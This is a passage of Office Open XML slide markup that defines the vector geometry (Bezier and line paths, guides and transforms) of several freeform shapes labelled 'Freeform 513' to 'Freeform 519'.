                        <a:pt x="49" y="51"/>
                        <a:pt x="51" y="47"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="35"/>
                        <a:pt x="48" y="27"/>
                        <a:pt x="43" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="20"/>
                        <a:pt x="43" y="20"/>
                        <a:pt x="43" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="11"/>
                        <a:pt x="26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21" name="Freeform 513">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE74958B-5F15-4277-B8EB-117756A39C8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7446" y="3118"/>
                  <a:ext cx="578" cy="735"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 578"/>
                    <a:gd name="T1" fmla="*/ 116 h 735"/>
                    <a:gd name="T2" fmla="*/ 23 w 578"/>
                    <a:gd name="T3" fmla="*/ 111 h 735"/>
                    <a:gd name="T4" fmla="*/ 158 w 578"/>
                    <a:gd name="T5" fmla="*/ 706 h 735"/>
                    <a:gd name="T6" fmla="*/ 550 w 578"/>
                    <a:gd name="T7" fmla="*/ 603 h 735"/>
                    <a:gd name="T8" fmla="*/ 415 w 578"/>
                    <a:gd name="T9" fmla="*/ 5 h 735"/>
                    <a:gd name="T10" fmla="*/ 437 w 578"/>
                    <a:gd name="T11" fmla="*/ 0 h 735"/>
                    <a:gd name="T12" fmla="*/ 578 w 578"/>
                    <a:gd name="T13" fmla="*/ 619 h 735"/>
                    <a:gd name="T14" fmla="*/ 141 w 578"/>
                    <a:gd name="T15" fmla="*/ 735 h 735"/>
                    <a:gd name="T16" fmla="*/ 0 w 578"/>
                    <a:gd name="T17" fmla="*/ 116 h 735"/>
                    <a:gd name="T18" fmla="*/ 0 w 578"/>
                    <a:gd name="T19" fmla="*/ 116 h 7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78" h="735">
                      <a:moveTo>
                        <a:pt x="0" y="116"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="706"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="550" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="437" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="578" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="735"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="116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22" name="Freeform 514">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D220CBE6-00AD-4ACF-B63E-1220EB6C1E7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7519" y="3175"/>
                  <a:ext cx="569" cy="371"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 144 w 569"/>
                    <a:gd name="T1" fmla="*/ 111 h 371"/>
                    <a:gd name="T2" fmla="*/ 144 w 569"/>
                    <a:gd name="T3" fmla="*/ 111 h 371"/>
                    <a:gd name="T4" fmla="*/ 153 w 569"/>
                    <a:gd name="T5" fmla="*/ 116 h 371"/>
                    <a:gd name="T6" fmla="*/ 24 w 569"/>
                    <a:gd name="T7" fmla="*/ 352 h 371"/>
                    <a:gd name="T8" fmla="*/ 423 w 569"/>
                    <a:gd name="T9" fmla="*/ 246 h 371"/>
                    <a:gd name="T10" fmla="*/ 560 w 569"/>
                    <a:gd name="T11" fmla="*/ 0 h 371"/>
                    <a:gd name="T12" fmla="*/ 569 w 569"/>
                    <a:gd name="T13" fmla="*/ 5 h 371"/>
                    <a:gd name="T14" fmla="*/ 430 w 569"/>
                    <a:gd name="T15" fmla="*/ 255 h 371"/>
                    <a:gd name="T16" fmla="*/ 0 w 569"/>
                    <a:gd name="T17" fmla="*/ 371 h 371"/>
                    <a:gd name="T18" fmla="*/ 144 w 569"/>
                    <a:gd name="T19" fmla="*/ 111 h 371"/>
                    <a:gd name="T20" fmla="*/ 144 w 569"/>
                    <a:gd name="T21" fmla="*/ 111 h 3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69" h="371">
                      <a:moveTo>
                        <a:pt x="144" y="111"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="144" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="153" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="423" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="560" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="569" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="430" y="255"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="371"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="144" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="144" y="1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23" name="Freeform 515">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5107D1B6-2B51-4501-AEE5-54DA146317E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7528" y="3763"/>
                  <a:ext cx="135" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 47 w 57"/>
                    <a:gd name="T1" fmla="*/ 57 h 64"/>
                    <a:gd name="T2" fmla="*/ 11 w 57"/>
                    <a:gd name="T3" fmla="*/ 45 h 64"/>
                    <a:gd name="T4" fmla="*/ 9 w 57"/>
                    <a:gd name="T5" fmla="*/ 7 h 64"/>
                    <a:gd name="T6" fmla="*/ 45 w 57"/>
                    <a:gd name="T7" fmla="*/ 19 h 64"/>
                    <a:gd name="T8" fmla="*/ 47 w 57"/>
                    <a:gd name="T9" fmla="*/ 57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64">
                      <a:moveTo>
                        <a:pt x="47" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="64"/>
                        <a:pt x="22" y="59"/>
                        <a:pt x="11" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="31"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="9" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="35" y="6"/>
                        <a:pt x="45" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="33"/>
                        <a:pt x="57" y="50"/>
                        <a:pt x="47" y="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24" name="Freeform 516">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4053D215-20FD-4B5A-AD18-D93B33B3BCC7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="17528" y="3768"/>
                  <a:ext cx="133" cy="144"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 56"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 9 w 56"/>
                    <a:gd name="T3" fmla="*/ 45 h 61"/>
                    <a:gd name="T4" fmla="*/ 9 w 56"/>
                    <a:gd name="T5" fmla="*/ 45 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 56"/>
                    <a:gd name="T7" fmla="*/ 20 h 61"/>
                    <a:gd name="T8" fmla="*/ 0 w 56"/>
                    <a:gd name="T9" fmla="*/ 20 h 61"/>
                    <a:gd name="T10" fmla="*/ 8 w 56"/>
                    <a:gd name="T11" fmla="*/ 3 h 61"/>
                    <a:gd name="T12" fmla="*/ 8 w 56"/>
                    <a:gd name="T13" fmla="*/ 3 h 61"/>
                    <a:gd name="T14" fmla="*/ 19 w 56"/>
                    <a:gd name="T15" fmla="*/ 0 h 61"/>
                    <a:gd name="T16" fmla="*/ 19 w 56"/>
                    <a:gd name="T17" fmla="*/ 0 h 61"/>
                    <a:gd name="T18" fmla="*/ 47 w 56"/>
                    <a:gd name="T19" fmla="*/ 16 h 61"/>
                    <a:gd name="T20" fmla="*/ 47 w 56"/>
                    <a:gd name="T21" fmla="*/ 16 h 61"/>
                    <a:gd name="T22" fmla="*/ 56 w 56"/>
                    <a:gd name="T23" fmla="*/ 40 h 61"/>
                    <a:gd name="T24" fmla="*/ 56 w 56"/>
                    <a:gd name="T25" fmla="*/ 40 h 61"/>
                    <a:gd name="T26" fmla="*/ 49 w 56"/>
                    <a:gd name="T27" fmla="*/ 57 h 61"/>
                    <a:gd name="T28" fmla="*/ 49 w 56"/>
                    <a:gd name="T29" fmla="*/ 57 h 61"/>
                    <a:gd name="T30" fmla="*/ 49 w 56"/>
                    <a:gd name="T31" fmla="*/ 57 h 61"/>
                    <a:gd name="T32" fmla="*/ 37 w 56"/>
                    <a:gd name="T33" fmla="*/ 61 h 61"/>
                    <a:gd name="T34" fmla="*/ 37 w 56"/>
                    <a:gd name="T35" fmla="*/ 61 h 61"/>
                    <a:gd name="T36" fmla="*/ 37 w 56"/>
                    <a:gd name="T37" fmla="*/ 61 h 61"/>
                    <a:gd name="T38" fmla="*/ 19 w 56"/>
                    <a:gd name="T39" fmla="*/ 5 h 61"/>
                    <a:gd name="T40" fmla="*/ 11 w 56"/>
                    <a:gd name="T41" fmla="*/ 7 h 61"/>
                    <a:gd name="T42" fmla="*/ 11 w 56"/>
                    <a:gd name="T43" fmla="*/ 7 h 61"/>
                    <a:gd name="T44" fmla="*/ 5 w 56"/>
                    <a:gd name="T45" fmla="*/ 20 h 61"/>
                    <a:gd name="T46" fmla="*/ 5 w 56"/>
                    <a:gd name="T47" fmla="*/ 20 h 61"/>
                    <a:gd name="T48" fmla="*/ 13 w 56"/>
                    <a:gd name="T49" fmla="*/ 42 h 61"/>
                    <a:gd name="T50" fmla="*/ 13 w 56"/>
                    <a:gd name="T51" fmla="*/ 42 h 61"/>
                    <a:gd name="T52" fmla="*/ 37 w 56"/>
                    <a:gd name="T53" fmla="*/ 56 h 61"/>
                    <a:gd name="T54" fmla="*/ 37 w 56"/>
                    <a:gd name="T55" fmla="*/ 56 h 61"/>
                    <a:gd name="T56" fmla="*/ 46 w 56"/>
                    <a:gd name="T57" fmla="*/ 53 h 61"/>
                    <a:gd name="T58" fmla="*/ 46 w 56"/>
                    <a:gd name="T59" fmla="*/ 53 h 61"/>
                    <a:gd name="T60" fmla="*/ 46 w 56"/>
                    <a:gd name="T61" fmla="*/ 53 h 61"/>
                    <a:gd name="T62" fmla="*/ 51 w 56"/>
                    <a:gd name="T63" fmla="*/ 40 h 61"/>
                    <a:gd name="T64" fmla="*/ 51 w 56"/>
                    <a:gd name="T65" fmla="*/ 40 h 61"/>
                    <a:gd name="T66" fmla="*/ 43 w 56"/>
                    <a:gd name="T67" fmla="*/ 19 h 61"/>
                    <a:gd name="T68" fmla="*/ 43 w 56"/>
                    <a:gd name="T69" fmla="*/ 19 h 61"/>
                    <a:gd name="T70" fmla="*/ 19 w 56"/>
                    <a:gd name="T71" fmla="*/ 5 h 61"/>
                    <a:gd name="T72" fmla="*/ 19 w 56"/>
                    <a:gd name="T73" fmla="*/ 5 h 61"/>
                    <a:gd name="T74" fmla="*/ 19 w 56"/>
                    <a:gd name="T75" fmla="*/ 5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56" h="61">
                      <a:moveTo>
                        <a:pt x="37" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="61"/>
                        <a:pt x="17" y="55"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="37"/>
                        <a:pt x="0" y="28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13"/>
                        <a:pt x="2" y="7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11" y="1"/>
                        <a:pt x="15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29" y="0"/>
                        <a:pt x="40" y="6"/>
                        <a:pt x="47" y="16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53" y="24"/>
                        <a:pt x="56" y="32"/>
                        <a:pt x="56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47"/>
                        <a:pt x="54" y="53"/>
                        <a:pt x="49" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="57"/>
                        <a:pt x="49" y="57"/>
                        <a:pt x="49" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="57"/>
                        <a:pt x="49" y="57"/>
                        <a:pt x="49" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="60"/>
                        <a:pt x="41" y="61"/>
                        <a:pt x="37" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="61"/>
                        <a:pt x="37" y="61"/>
                        <a:pt x="37" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="61"/>
                        <a:pt x="37" y="61"/>
                        <a:pt x="37" y="61"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="19" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="5"/>
                        <a:pt x="13" y="6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7" y="10"/>
                        <a:pt x="5" y="15"/>
                        <a:pt x="5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27"/>
                        <a:pt x="8" y="35"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="51"/>
                        <a:pt x="30" y="56"/>
                        <a:pt x="37" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="56"/>
                        <a:pt x="37" y="56"/>
                        <a:pt x="37" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="56"/>
                        <a:pt x="43" y="55"/>
                        <a:pt x="46" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="53"/>
                        <a:pt x="46" y="53"/>
                        <a:pt x="46" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="53"/>
                        <a:pt x="46" y="53"/>
                        <a:pt x="46" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="50"/>
                        <a:pt x="51" y="46"/>
                        <a:pt x="51" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="40"/>
                        <a:pt x="51" y="40"/>
                        <a:pt x="51" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="34"/>
                        <a:pt x="48" y="26"/>
                        <a:pt x="43" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="19"/>
                        <a:pt x="43" y="19"/>
                        <a:pt x="43" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="10"/>
                        <a:pt x="27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25" name="Freeform 517">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B862E3DC-1BF1-4AF9-81E6-1A8B02D3C46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491" y="2835"/>
                  <a:ext cx="1996" cy="557"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 839 w 845"/>
                    <a:gd name="T1" fmla="*/ 168 h 236"/>
                    <a:gd name="T2" fmla="*/ 216 w 845"/>
                    <a:gd name="T3" fmla="*/ 0 h 236"/>
                    <a:gd name="T4" fmla="*/ 7 w 845"/>
                    <a:gd name="T5" fmla="*/ 57 h 236"/>
                    <a:gd name="T6" fmla="*/ 7 w 845"/>
                    <a:gd name="T7" fmla="*/ 68 h 236"/>
                    <a:gd name="T8" fmla="*/ 629 w 845"/>
                    <a:gd name="T9" fmla="*/ 236 h 236"/>
                    <a:gd name="T10" fmla="*/ 839 w 845"/>
                    <a:gd name="T11" fmla="*/ 179 h 236"/>
                    <a:gd name="T12" fmla="*/ 839 w 845"/>
                    <a:gd name="T13" fmla="*/ 168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45" h="236">
                      <a:moveTo>
                        <a:pt x="839" y="168"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="833" y="168"/>
                        <a:pt x="241" y="0"/>
                        <a:pt x="216" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="0"/>
                        <a:pt x="13" y="57"/>
                        <a:pt x="7" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="57"/>
                        <a:pt x="2" y="68"/>
                        <a:pt x="7" y="68"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="68"/>
                        <a:pt x="593" y="236"/>
                        <a:pt x="629" y="236"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="666" y="236"/>
                        <a:pt x="835" y="179"/>
                        <a:pt x="839" y="179"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="843" y="179"/>
                        <a:pt x="845" y="168"/>
                        <a:pt x="839" y="1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26" name="Freeform 518">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B30A45-C207-47C0-A64A-352CD077DD55}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="17011" y="2634"/>
                  <a:ext cx="1543" cy="543"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 620 w 653"/>
                    <a:gd name="T1" fmla="*/ 153 h 230"/>
                    <a:gd name="T2" fmla="*/ 54 w 653"/>
                    <a:gd name="T3" fmla="*/ 1 h 230"/>
                    <a:gd name="T4" fmla="*/ 44 w 653"/>
                    <a:gd name="T5" fmla="*/ 0 h 230"/>
                    <a:gd name="T6" fmla="*/ 6 w 653"/>
                    <a:gd name="T7" fmla="*/ 29 h 230"/>
                    <a:gd name="T8" fmla="*/ 33 w 653"/>
                    <a:gd name="T9" fmla="*/ 77 h 230"/>
                    <a:gd name="T10" fmla="*/ 600 w 653"/>
                    <a:gd name="T11" fmla="*/ 229 h 230"/>
                    <a:gd name="T12" fmla="*/ 610 w 653"/>
                    <a:gd name="T13" fmla="*/ 230 h 230"/>
                    <a:gd name="T14" fmla="*/ 648 w 653"/>
                    <a:gd name="T15" fmla="*/ 201 h 230"/>
                    <a:gd name="T16" fmla="*/ 620 w 653"/>
                    <a:gd name="T17" fmla="*/ 153 h 230"/>
                    <a:gd name="T18" fmla="*/ 181 w 653"/>
                    <a:gd name="T19" fmla="*/ 82 h 230"/>
                    <a:gd name="T20" fmla="*/ 456 w 653"/>
                    <a:gd name="T21" fmla="*/ 154 h 230"/>
                    <a:gd name="T22" fmla="*/ 456 w 653"/>
                    <a:gd name="T23" fmla="*/ 181 h 230"/>
                    <a:gd name="T24" fmla="*/ 181 w 653"/>
                    <a:gd name="T25" fmla="*/ 107 h 230"/>
                    <a:gd name="T26" fmla="*/ 181 w 653"/>
                    <a:gd name="T27" fmla="*/ 82 h 230"/>
                    <a:gd name="T28" fmla="*/ 456 w 653"/>
                    <a:gd name="T29" fmla="*/ 145 h 230"/>
                    <a:gd name="T30" fmla="*/ 181 w 653"/>
                    <a:gd name="T31" fmla="*/ 73 h 230"/>
                    <a:gd name="T32" fmla="*/ 181 w 653"/>
                    <a:gd name="T33" fmla="*/ 44 h 230"/>
                    <a:gd name="T34" fmla="*/ 456 w 653"/>
                    <a:gd name="T35" fmla="*/ 118 h 230"/>
                    <a:gd name="T36" fmla="*/ 456 w 653"/>
                    <a:gd name="T37" fmla="*/ 145 h 230"/>
                    <a:gd name="T38" fmla="*/ 14 w 653"/>
                    <a:gd name="T39" fmla="*/ 31 h 230"/>
                    <a:gd name="T40" fmla="*/ 44 w 653"/>
                    <a:gd name="T41" fmla="*/ 8 h 230"/>
                    <a:gd name="T42" fmla="*/ 52 w 653"/>
                    <a:gd name="T43" fmla="*/ 9 h 230"/>
                    <a:gd name="T44" fmla="*/ 173 w 653"/>
                    <a:gd name="T45" fmla="*/ 42 h 230"/>
                    <a:gd name="T46" fmla="*/ 173 w 653"/>
                    <a:gd name="T47" fmla="*/ 105 h 230"/>
                    <a:gd name="T48" fmla="*/ 36 w 653"/>
                    <a:gd name="T49" fmla="*/ 68 h 230"/>
                    <a:gd name="T50" fmla="*/ 14 w 653"/>
                    <a:gd name="T51" fmla="*/ 31 h 230"/>
                    <a:gd name="T52" fmla="*/ 639 w 653"/>
                    <a:gd name="T53" fmla="*/ 199 h 230"/>
                    <a:gd name="T54" fmla="*/ 610 w 653"/>
                    <a:gd name="T55" fmla="*/ 222 h 230"/>
                    <a:gd name="T56" fmla="*/ 602 w 653"/>
                    <a:gd name="T57" fmla="*/ 221 h 230"/>
                    <a:gd name="T58" fmla="*/ 465 w 653"/>
                    <a:gd name="T59" fmla="*/ 184 h 230"/>
                    <a:gd name="T60" fmla="*/ 465 w 653"/>
                    <a:gd name="T61" fmla="*/ 121 h 230"/>
                    <a:gd name="T62" fmla="*/ 618 w 653"/>
                    <a:gd name="T63" fmla="*/ 162 h 230"/>
                    <a:gd name="T64" fmla="*/ 639 w 653"/>
                    <a:gd name="T65" fmla="*/ 199 h 2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653" h="230">
                      <a:moveTo>
                        <a:pt x="620" y="153"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="1"/>
                        <a:pt x="54" y="1"/>
                        <a:pt x="54" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="47" y="0"/>
                        <a:pt x="44" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="0"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="6" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="49"/>
                        <a:pt x="13" y="71"/>
                        <a:pt x="33" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="600" y="229"/>
                        <a:pt x="600" y="229"/>
                        <a:pt x="600" y="229"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="603" y="230"/>
                        <a:pt x="606" y="230"/>
                        <a:pt x="610" y="230"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="627" y="230"/>
                        <a:pt x="643" y="218"/>
                        <a:pt x="648" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="653" y="180"/>
                        <a:pt x="641" y="159"/>
                        <a:pt x="620" y="153"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="181" y="82"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="154"/>
                        <a:pt x="456" y="154"/>
                        <a:pt x="456" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="181"/>
                        <a:pt x="456" y="181"/>
                        <a:pt x="456" y="181"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="107"/>
                        <a:pt x="181" y="107"/>
                        <a:pt x="181" y="107"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="181" y="82"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="456" y="145"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="73"/>
                        <a:pt x="181" y="73"/>
                        <a:pt x="181" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="44"/>
                        <a:pt x="181" y="44"/>
                        <a:pt x="181" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="456" y="118"/>
                        <a:pt x="456" y="118"/>
                        <a:pt x="456" y="118"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="456" y="145"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="14" y="31"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="18"/>
                        <a:pt x="30" y="8"/>
                        <a:pt x="44" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="8"/>
                        <a:pt x="49" y="9"/>
                        <a:pt x="52" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="173" y="42"/>
                        <a:pt x="173" y="42"/>
                        <a:pt x="173" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="173" y="105"/>
                        <a:pt x="173" y="105"/>
                        <a:pt x="173" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="68"/>
                        <a:pt x="36" y="68"/>
                        <a:pt x="36" y="68"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="64"/>
                        <a:pt x="10" y="47"/>
                        <a:pt x="14" y="31"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="639" y="199"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="636" y="212"/>
                        <a:pt x="623" y="222"/>
                        <a:pt x="610" y="222"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="607" y="222"/>
                        <a:pt x="604" y="221"/>
                        <a:pt x="602" y="221"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="465" y="184"/>
                        <a:pt x="465" y="184"/>
                        <a:pt x="465" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="465" y="121"/>
                        <a:pt x="465" y="121"/>
                        <a:pt x="465" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="618" y="162"/>
                        <a:pt x="618" y="162"/>
                        <a:pt x="618" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="634" y="166"/>
                        <a:pt x="643" y="183"/>
                        <a:pt x="639" y="19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27" name="Freeform 519">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5C9646-C41E-436D-90CE-22BD8DE77B9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480" y="2743"/>
                  <a:ext cx="2017" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 844 w 854"/>
                    <a:gd name="T1" fmla="*/ 168 h 263"/>
                    <a:gd name="T2" fmla="*/ 221 w 854"/>
                    <a:gd name="T3" fmla="*/ 0 h 263"/>
                    <a:gd name="T4" fmla="*/ 12 w 854"/>
                    <a:gd name="T5" fmla="*/ 56 h 263"/>
                    <a:gd name="T6" fmla="*/ 12 w 854"/>
                    <a:gd name="T7" fmla="*/ 96 h 263"/>
                    <a:gd name="T8" fmla="*/ 634 w 854"/>
                    <a:gd name="T9" fmla="*/ 263 h 263"/>
                    <a:gd name="T10" fmla="*/ 844 w 854"/>
                    <a:gd name="T11" fmla="*/ 207 h 263"/>
                    <a:gd name="T12" fmla="*/ 844 w 854"/>
                    <a:gd name="T13" fmla="*/ 168 h 2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54" h="263">
                      <a:moveTo>
                        <a:pt x="844" y="168"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="844" y="168"/>
                        <a:pt x="246" y="0"/>
                        <a:pt x="221" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="197" y="0"/>
                        <a:pt x="12" y="56"/>
                        <a:pt x="12" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="56"/>
                        <a:pt x="0" y="96"/>
                        <a:pt x="12" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="96"/>
                        <a:pt x="600" y="263"/>
                        <a:pt x="634" y="263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="668" y="263"/>
                        <a:pt x="844" y="207"/>
                        <a:pt x="844" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="850" y="204"/>
